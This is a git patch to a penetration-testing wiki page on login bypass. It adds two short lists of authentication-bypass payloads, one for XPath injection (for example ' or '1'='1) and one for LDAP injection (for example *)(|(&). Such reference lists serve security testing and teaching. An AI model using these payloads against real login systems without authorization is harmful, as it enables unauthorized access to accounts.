From 46617092f7e079cae7897ba130b16dbdeca3c8f7 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Sat, 26 Jun 2021 16:00:08 +0000
Subject: [PATCH] GitBook: [master] one page modified

---
 pentesting-web/login-bypass/README.md | 37 ++++++++++++++++++++++++---
 1 file changed, 33 insertions(+), 4 deletions(-)

diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md
index 955fd0aeb..dc9e6abd5 100644
--- a/pentesting-web/login-bypass/README.md
+++ b/pentesting-web/login-bypass/README.md
@@ -30,12 +30,41 @@ As the NoSQL Injections requires to change the parameters value, you will need t
 
 ### XPath Injection authentication bypass
 
+[Here you can find several tricks to bypass the login via **XPath Injection.**](../xpath-injection.md#authentication-bypass)\*\*\*\*
 
+```text
+' or '1'='1
+' or ''='
+' or 1]%00
+' or /* or '
+' or "a" or '
+' or 1 or '
+' or true() or '
+'or string-length(name(.))<10 or'
+'or contains(name,'adm') or'
+'or contains(.,'adm') or'
+'or position()=2 or'
+admin' or '
+admin' or '1'='2
+```
 
-## 
+### LDAP Injection authentication bypass
+
+[Here you can find several tricks to bypass the login via **LDAP Injection.**](../ldap-injection.md#login-bypass)\*\*\*\*
+
+```text
+*
+*)(&
+*)(|(&
+pwd)
+*)(|(*
+*))%00
+admin)(&)
+pwd
+admin)(!(&(|
+pwd))
+admin))(|(|
+```
 
 
 
-* [**XPath Injection**](../xpath-injection.md)
-* [**LDAP Injection**](../ldap-injection.md)
-